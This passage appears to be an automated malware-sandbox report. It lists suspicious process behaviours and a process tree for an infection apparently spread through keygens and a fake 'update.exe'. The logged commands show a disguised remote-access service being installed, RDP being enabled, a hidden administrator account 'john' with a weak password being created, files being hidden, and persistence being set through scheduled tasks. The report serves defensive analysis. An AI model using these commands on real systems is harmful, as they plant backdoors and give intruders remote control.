    1732 | LtHv0O2KZDK4M637.exe
    1732 | LtHv0O2KZDK4M637.exe
    1236 | key.exe
    1236 | key.exe
    1076 | 2.exe
    2148 | 2.exe
    2148 | 2.exe
  • Suspicious behavior: GetForegroundWindowSpam
    5.exe, Explorer.EXE, taskhostw.exe, api.exe, WerFault.exe, WerFault.exe, msiexec.exe, vbc.exe, msiexec.exe, keygen-step-4.exe, taskhost.exe

    Reported IOCs

    pid | process
    2588 | 5.exe
    1268 | Explorer.EXE
    4072 | taskhostw.exe
    2308 | api.exe
    1720 | WerFault.exe
    4828 | WerFault.exe
    3188 | msiexec.exe
    4800 | vbc.exe
    2852 | msiexec.exe
    2804 | keygen-step-4.exe
    3516 | taskhost.exe
  • Suspicious behavior: LoadsDriver
    svchost.exe

    Reported IOCs

    pid | process
    468 |
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
    3608 | svchost.exe
  • Suspicious behavior: MapViewOfSection
    2.exe, 2.exe, cmmon32.exe, 18.exe, mstsc.exe, 3.exe, 13.exe, IconCachenb6h.exe, IconCachenb6h.exe, Styltendeschris.exe, 19.exe, 11.exe, hmwmcj.exe, IconCachenb6h.exe, IconCachenb6h.exe, cmmon32.exe, helpqrqlwhj.exe, IconCachenb6h.exe, IconCachenb6h.exe, 23.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe

    Reported IOCs

    pid | process
    1076 | 2.exe
    2148 | 2.exe
    2148 | 2.exe
    2148 | 2.exe
    2428 | cmmon32.exe
    2428 | cmmon32.exe
    3068 | 18.exe
    3068 | 18.exe
    3068 | 18.exe
    3636 | mstsc.exe
    3636 | mstsc.exe
    2632 | 3.exe
    1604 | 13.exe
    3844 | IconCachenb6h.exe
    1548 | IconCachenb6h.exe
    1548 | IconCachenb6h.exe
    1548 | IconCachenb6h.exe
    1908 | Styltendeschris.exe
    3008 | 19.exe
    2828 | 11.exe
    2828 | 11.exe
    4356 | hmwmcj.exe
    2828 | 11.exe
    2828 | 11.exe
    2416 | IconCachenb6h.exe
    4356 | hmwmcj.exe
    1568 | IconCachenb6h.exe
    4356 | hmwmcj.exe
    1568 | IconCachenb6h.exe
    1568 | IconCachenb6h.exe
    4356 | hmwmcj.exe
    4560 | cmmon32.exe
    4560 | cmmon32.exe
    4356 | hmwmcj.exe
    3432 | helpqrqlwhj.exe
    4356 | hmwmcj.exe
    3432 | helpqrqlwhj.exe
    3432 | helpqrqlwhj.exe
    5052 | IconCachenb6h.exe
    4032 | IconCachenb6h.exe
    4032 | IconCachenb6h.exe
    4032 | IconCachenb6h.exe
    4032 | IconCachenb6h.exe
    3744 | 23.exe
    4680 | IconCachenb6h.exe
    2412 | IconCachenb6h.exe
    2412 | IconCachenb6h.exe
    2412 | IconCachenb6h.exe
    2412 | IconCachenb6h.exe
    5020 | IconCachenb6h.exe
    3580 | IconCachenb6h.exe
    3580 | IconCachenb6h.exe
    3580 | IconCachenb6h.exe
    3580 | IconCachenb6h.exe
    3256 | IconCachenb6h.exe
    4424 | IconCachenb6h.exe
    2428 | cmmon32.exe
    4424 | IconCachenb6h.exe
    4424 | IconCachenb6h.exe
    2428 | cmmon32.exe
    2428 | cmmon32.exe
    2428 | cmmon32.exe
    2428 | cmmon32.exe
    2428 | cmmon32.exe
  • Suspicious behavior: RenamesItself
    16.exe

    Reported IOCs

    pid | process
    816 | 16.exe
  • Suspicious behavior: SetClipboardViewer
    InstallUtil.exe

    Reported IOCs

    pid | process
    3704 | InstallUtil.exe
  • Suspicious use of AdjustPrivilegeToken
    rutserv.exe, rutserv.exe, rutserv.exe, api.exe, 2.exe, Explorer.EXE, 5.exe, cmmon32.exe, 8.exe, 26.exe, AUDIODG.EXE, 18.exe, vssvc.exe, mstsc.exe, key.exe

    Reported IOCs

    description  pid  process
    Token: SeDebugPrivilege  1516  rutserv.exe
    Token: SeDebugPrivilege  2180  rutserv.exe
    Token: SeTakeOwnershipPrivilege  2280  rutserv.exe
    Token: SeTcbPrivilege  2280  rutserv.exe
    Token: SeTcbPrivilege  2280  rutserv.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2308  api.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2148  2.exe
    Token: SeShutdownPrivilege  1268  Explorer.EXE
    Token: SeDebugPrivilege  2588  5.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2308  api.exe
    Token: SeDebugPrivilege  2428  cmmon32.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeShutdownPrivilege  1268  Explorer.EXE
    Token: SeShutdownPrivilege  1268  Explorer.EXE
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeShutdownPrivilege  1268  Explorer.EXE
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeRestorePrivilege  2308  api.exe
    Token: SeTakeOwnershipPrivilege  2308  api.exe
    Token: SeShutdownPrivilege  1268  Explorer.EXE
    Token: SeShutdownPrivilege  1268  Explorer.EXE
    Token: SeShutdownPrivilege  1268  Explorer.EXE
    Token: SeDebugPrivilege  2352  8.exe
    Token: SeDebugPrivilege  3956  26.exe
    Token: 33  2660  AUDIODG.EXE
    Token: SeIncBasePriorityPrivilege  2660  AUDIODG.EXE
    Token: 33  2660  AUDIODG.EXE
    Token: SeIncBasePriorityPrivilege  2660  AUDIODG.EXE
    Token: SeDebugPrivilege  3068  18.exe
    Token: SeBackupPrivilege  2800  vssvc.exe
    Token: SeRestorePrivilege  2800  vssvc.exe
    Token: SeAuditPrivilege  2800  vssvc.exe
    Token: SeDebugPrivilege  3636  mstsc.exe
    Token: SeImpersonatePrivilege  1236  key.exe
    Token: SeTcbPrivilege  1236  key.exe
    Token: SeChangeNotifyPrivilege  1236  key.exe
    Token: SeCreateTokenPrivilege  1236  key.exe
    Token: SeBackupPrivilege  1236  key.exe
    Token: SeRestorePrivilege  1236  key.exe
    Token: SeIncreaseQuotaPrivilege  1236  key.exe
    Token: SeAssignPrimaryTokenPrivilege  1236  key.exe
    Token: SeImpersonatePrivilege  1236  key.exe
    Token: SeTcbPrivilege  1236  key.exe
    Token: SeChangeNotifyPrivilege  1236  key.exe
    Token: SeCreateTokenPrivilege  1236  key.exe
  • Suspicious use of FindShellTrayWindow
    Downloads.exe, 30.exe, Explorer.EXE, msiexec.exe, api.exe, update.exe, iexplore.exe, iexplore.exe, msiexec.exe

    Reported IOCs

    pid   process
    2024  Downloads.exe
    948   30.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    3188  msiexec.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    2308  api.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    2308  api.exe
    4948  update.exe
    4948  update.exe
    4948  update.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1208  iexplore.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    4716  iexplore.exe
    2852  msiexec.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1208  iexplore.exe
    2308  api.exe
    2308  api.exe
    1208  iexplore.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
  • Suspicious use of SendNotifyMessage
    30.exe, Explorer.EXE, api.exe, update.exe

    Reported IOCs

    pid   process
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    948   30.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    2308  api.exe
    2308  api.exe
    4948  update.exe
    4948  update.exe
    4948  update.exe
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    1268  Explorer.EXE
    2308  api.exe
    2308  api.exe
  • Suspicious use of SetWindowsHookEx
    Downloads.exe, rutserv.exe, 002.exe, rutserv.exe, rutserv.exe, rutserv.exe, 002.exe, api.exe, 3.exe, 5.exe, 7.exe, 15.exe, 13.exe, 20.exe, 23.exe, 25.exe, 19.exe, rundll32.exe, 28.exe, 31.exe, keygen-step-2.exe, iexplore.exe, 002.exe, Styltendeschris.exe, id6.exe, IEXPLORE.EXE, wyfdggaa.exe, iexplore.exe, IEXPLORE.EXE, 24.exe, InstallUtil.exe, IEXPLORE.EXE, IEXPLORE.EXE

    Reported IOCs

    pid   process
    2024  Downloads.exe
    2024  Downloads.exe
    1516  rutserv.exe
    1940  002.exe
    1940  002.exe
    1600  rutserv.exe
    2180  rutserv.exe
    2280  rutserv.exe
    3060  002.exe
    3060  002.exe
    2308  api.exe
    2632  3.exe
    2588  5.exe
    1900  7.exe
    1944  15.exe
    1604  13.exe
    3136  20.exe
    3744  23.exe
    3868  25.exe
    3008  19.exe
    3132  rundll32.exe
    4084  28.exe
    3324  31.exe
    2016  keygen-step-2.exe
    1208  iexplore.exe
    1208  iexplore.exe
    4224  002.exe
    4224  002.exe
    1908  Styltendeschris.exe
    1160  id6.exe
    1160  id6.exe
    4436  IEXPLORE.EXE
    4436  IEXPLORE.EXE
    3376  wyfdggaa.exe
    3376  wyfdggaa.exe
    3376  wyfdggaa.exe
    3376  wyfdggaa.exe
    4716  iexplore.exe
    4716  iexplore.exe
    2568  IEXPLORE.EXE
    2568  IEXPLORE.EXE
    1552  24.exe
    3704  InstallUtil.exe
    1208  iexplore.exe
    1208  iexplore.exe
    6060  IEXPLORE.EXE
    6060  IEXPLORE.EXE
    1208  iexplore.exe
    1208  iexplore.exe
    2164  IEXPLORE.EXE
    2164  IEXPLORE.EXE
  • Suspicious use of WriteProcessMemory
    update.exe, wini.exe, WScript.exe, cmd.exe, Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe, cmd.exe, keygen-pr.exe

    Reported IOCs

    description  pid  process  target process
    PID 1748 wrote to memory of 876  1748  update.exe  wini.exe
    PID 1748 wrote to memory of 876  1748  update.exe  wini.exe
    PID 1748 wrote to memory of 876  1748  update.exe  wini.exe
    PID 1748 wrote to memory of 876  1748  update.exe  wini.exe
    PID 876 wrote to memory of 408  876  wini.exe  WScript.exe
    PID 876 wrote to memory of 408  876  wini.exe  WScript.exe
    PID 876 wrote to memory of 408  876  wini.exe  WScript.exe
    PID 876 wrote to memory of 408  876  wini.exe  WScript.exe
    PID 876 wrote to memory of 1632  876  wini.exe  winit.exe
    PID 876 wrote to memory of 1632  876  wini.exe  winit.exe
    PID 876 wrote to memory of 1632  876  wini.exe  winit.exe
    PID 876 wrote to memory of 1632  876  wini.exe  winit.exe
    PID 408 wrote to memory of 440  408  WScript.exe  cmd.exe
    PID 408 wrote to memory of 440  408  WScript.exe  cmd.exe
    PID 408 wrote to memory of 440  408  WScript.exe  cmd.exe
    PID 408 wrote to memory of 440  408  WScript.exe  cmd.exe
    PID 408 wrote to memory of 440  408  WScript.exe  cmd.exe
    PID 408 wrote to memory of 440  408  WScript.exe  cmd.exe
    PID 408 wrote to memory of 440  408  WScript.exe  cmd.exe
    PID 440 wrote to memory of 1648  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1648  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1648  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1648  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1568  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1568  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1568  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1568  440  cmd.exe  regedit.exe
    PID 440 wrote to memory of 1016  440  cmd.exe  timeout.exe
    PID 440 wrote to memory of 1016  440  cmd.exe  timeout.exe
    PID 440 wrote to memory of 1016  440  cmd.exe  timeout.exe
    PID 440 wrote to memory of 1016  440  cmd.exe  timeout.exe
    PID 1248 wrote to memory of 240  1248  Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe  cmd.exe
    PID 1248 wrote to memory of 240  1248  Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe  cmd.exe
    PID 1248 wrote to memory of 240  1248  Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe  cmd.exe
    PID 1248 wrote to memory of 240  1248  Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe  cmd.exe
    PID 240 wrote to memory of 996  240  cmd.exe  intro.exe
    PID 240 wrote to memory of 996  240  cmd.exe  intro.exe
    PID 240 wrote to memory of 996  240  cmd.exe  intro.exe
    PID 240 wrote to memory of 996  240  cmd.exe  intro.exe
    PID 240 wrote to memory of 1320  240  cmd.exe  keygen-pr.exe
    PID 240 wrote to memory of 1320  240  cmd.exe  keygen-pr.exe
    PID 240 wrote to memory of 1320  240  cmd.exe  keygen-pr.exe
    PID 240 wrote to memory of 1320  240  cmd.exe  keygen-pr.exe
    PID 240 wrote to memory of 1320  240  cmd.exe  keygen-pr.exe
    PID 240 wrote to memory of 1320  240  cmd.exe  keygen-pr.exe
    PID 240 wrote to memory of 1320  240  cmd.exe  keygen-pr.exe
    PID 240 wrote to memory of 1604  240  cmd.exe  keygen-step-1.exe
    PID 240 wrote to memory of 1604  240  cmd.exe  keygen-step-1.exe
    PID 240 wrote to memory of 1604  240  cmd.exe  keygen-step-1.exe
    PID 240 wrote to memory of 1604  240  cmd.exe  keygen-step-1.exe
    PID 1748 wrote to memory of 1764  1748  update.exe  cheat.exe
    PID 1748 wrote to memory of 1764  1748  update.exe  cheat.exe
    PID 1748 wrote to memory of 1764  1748  update.exe  cheat.exe
    PID 1748 wrote to memory of 1764  1748  update.exe  cheat.exe
    PID 240 wrote to memory of 316  240  cmd.exe  keygen-step-4.exe
    PID 240 wrote to memory of 316  240  cmd.exe  keygen-step-4.exe
    PID 240 wrote to memory of 316  240  cmd.exe  keygen-step-4.exe
    PID 240 wrote to memory of 316  240  cmd.exe  keygen-step-4.exe
    PID 440 wrote to memory of 1516  440  cmd.exe  rutserv.exe
    PID 440 wrote to memory of 1516  440  cmd.exe  rutserv.exe
    PID 440 wrote to memory of 1516  440  cmd.exe  rutserv.exe
    PID 440 wrote to memory of 1516  440  cmd.exe  rutserv.exe
    PID 1320 wrote to memory of 1236  1320  keygen-pr.exe  key.exe
    PID 1320 wrote to memory of 1236  1320  keygen-pr.exe  key.exe
  • Views/modifies file attributes
    attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe

    Tags

    TTPs

    Hidden Files and Directories

    Reported IOCs

    pid   process
    3248  attrib.exe
    3640  attrib.exe
    2576  attrib.exe
    2892  attrib.exe
    476   attrib.exe
Processes 495
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    Suspicious behavior: GetForegroundWindowSpam
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    PID:1268
    • C:\Users\Admin\AppData\Local\Temp\Downloads.exe
      "C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2024
    • C:\Users\Admin\Desktop\update.exe
      "C:\Users\Admin\Desktop\update.exe"
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      Modifies WinLogon
      NTFS ADS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1748
      • C:\ProgramData\Microsoft\Intel\wini.exe
        C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        PID:876
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
          Suspicious use of WriteProcessMemory
          PID:408
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Programdata\Windows\install.bat" "
            Loads dropped DLL
            Suspicious use of WriteProcessMemory
            PID:440
            • C:\Windows\SysWOW64\regedit.exe
              regedit /s "reg1.reg"
              Runs .reg file with regedit
              PID:1648
            • C:\Windows\SysWOW64\regedit.exe
              regedit /s "reg2.reg"
              Runs .reg file with regedit
              PID:1568
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              Delays execution with timeout.exe
              PID:1016
            • C:\ProgramData\Windows\rutserv.exe
              rutserv.exe /silentinstall
              Executes dropped EXE
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              Suspicious use of SetWindowsHookEx
              PID:1516
            • C:\ProgramData\Windows\rutserv.exe
              rutserv.exe /firewall
              Executes dropped EXE
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of SetWindowsHookEx
              PID:1600
            • C:\ProgramData\Windows\rutserv.exe
              rutserv.exe /start
              Executes dropped EXE
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              Suspicious use of SetWindowsHookEx
              PID:2180
            • C:\Windows\SysWOW64\attrib.exe
              ATTRIB +H +S C:\Programdata\Windows\*.*
              Views/modifies file attributes
              PID:2892
            • C:\Windows\SysWOW64\attrib.exe
              ATTRIB +H +S C:\Programdata\Windows
              Views/modifies file attributes
              PID:476
            • C:\Windows\SysWOW64\sc.exe
              sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
              PID:2352
            • C:\Windows\SysWOW64\sc.exe
              sc config RManService obj= LocalSystem type= interact type= own
              PID:2660
            • C:\Windows\SysWOW64\sc.exe
              sc config RManService DisplayName= "Microsoft Framework"
              PID:2696
        • C:\ProgramData\Windows\winit.exe
          "C:\ProgramData\Windows\winit.exe"
          Executes dropped EXE
          Checks processor information in registry
          Modifies registry class
          Modifies system certificate store
          Suspicious behavior: EnumeratesProcesses
          PID:1632
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Programdata\Install\del.bat
            PID:2052
            • C:\Windows\SysWOW64\timeout.exe
              timeout 5
              Delays execution with timeout.exe
              PID:2928
      • C:\programdata\install\cheat.exe
        C:\programdata\install\cheat.exe -pnaxui
        Executes dropped EXE
        Loads dropped DLL
        PID:1764
        • C:\ProgramData\Microsoft\Intel\taskhost.exe
          "C:\ProgramData\Microsoft\Intel\taskhost.exe"
          Executes dropped EXE
          NTFS ADS
          PID:1760
          • C:\Programdata\RealtekHD\taskhostw.exe
            C:\Programdata\RealtekHD\taskhostw.exe
            Adds Run key to start application
            Suspicious behavior: GetForegroundWindowSpam
            PID:4072
          • C:\ProgramData\Microsoft\Intel\R8.exe
            C:\ProgramData\Microsoft\Intel\R8.exe
            PID:2472
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
              PID:3712
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\rdp\pause.bat" "
                PID:4176
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im Rar.exe
                  Kills process with taskkill
                  PID:2940
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im Rar.exe
                  Kills process with taskkill
                  PID:4792
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 3
                  Delays execution with timeout.exe
                  PID:3584
                • C:\Windows\SysWOW64\chcp.com
                  chcp 1251
                  PID:4900
                • C:\rdp\Rar.exe
                  "Rar.exe" e -p555 db.rar
                  PID:3548
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im Rar.exe
                  Kills process with taskkill
                  PID:1224
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  Delays execution with timeout.exe
                  PID:2860
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                  PID:1860
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\rdp\bat.bat" "
                    PID:3696
                    • C:\Windows\SysWOW64\reg.exe
                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                      PID:2320
                    • C:\Windows\SysWOW64\reg.exe
                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                      PID:3892
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                      PID:5376
                    • C:\Windows\SysWOW64\net.exe
                      net.exe user "john" "12345" /add
                      PID:5912
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user "john" "12345" /add
                        PID:5996
                    • C:\Windows\SysWOW64\chcp.com
                      chcp 1251
                      PID:4652
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Администраторы" "John" /add
                      PID:3960
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                        PID:2368
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Administratorzy" "John" /add
                      PID:1332
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                        PID:5664
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Administrators" John /add
                      PID:5760
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Administrators" John /add
                        PID:5784
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Administradores" John /add
                      PID:4208
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Administradores" John /add
                        PID:2004
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:996
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                        PID:5416
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Пользователи удаленного управления" John /add
                      PID:1376
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                        PID:3048
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Remote Desktop Users" John /add
                      PID:4672
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                        PID:1420
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Usuarios de escritorio remoto" John /add
                      PID:888
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                        PID:1860
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:2180
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                        PID:6132
                    • C:\rdp\RDPWInst.exe
                      "RDPWInst.exe" -i -o
                      PID:5136
                    • C:\rdp\RDPWInst.exe
                      "RDPWInst.exe" -w
                      PID:4928
                    • C:\Windows\SysWOW64\reg.exe
                      reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                      PID:1004
                    • C:\Windows\SysWOW64\net.exe
                      net accounts /maxpwage:unlimited
                      PID:3620
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 accounts /maxpwage:unlimited
                        PID:5756
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                      Views/modifies file attributes
                      PID:3248
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +s +h "C:\Program Files\RDP Wrapper"
                      Views/modifies file attributes
                      PID:3640
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +s +h "C:\rdp"
                      Views/modifies file attributes
                      PID:2576
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  Delays execution with timeout.exe
                  PID:4708
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\programdata\microsoft\temp\H.bat
            Drops file in Drivers directory
            PID:3692
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
            Creates scheduled task(s)
            PID:1528
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
            Creates scheduled task(s)
            PID:3908
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
            Creates scheduled task(s)
            PID:2164
          • C:\ProgramData\WindowsTask\update.exe
            C:\ProgramData\WindowsTask\update.exe
            Suspicious use of FindShellTrayWindow
            Suspicious use of SendNotifyMessage
            PID:4948
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
        Creates scheduled task(s)
        PID:1036
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
        Creates scheduled task(s)
        PID:1636
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
        Creates scheduled task(s)
        PID:1520
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
        Creates scheduled task(s)
        PID:1416
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc start appidsvc
        PID:1516
        • C:\Windows\SysWOW64\sc.exe
          sc start appidsvc
          PID:2144
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sc start appmgmt
        PID:2060
        • C:\Windows\SysWOW64\sc.exe
          sc start appmgmt
          PID:2152
      • C:\Windows\SysWOW64\cmd.exe
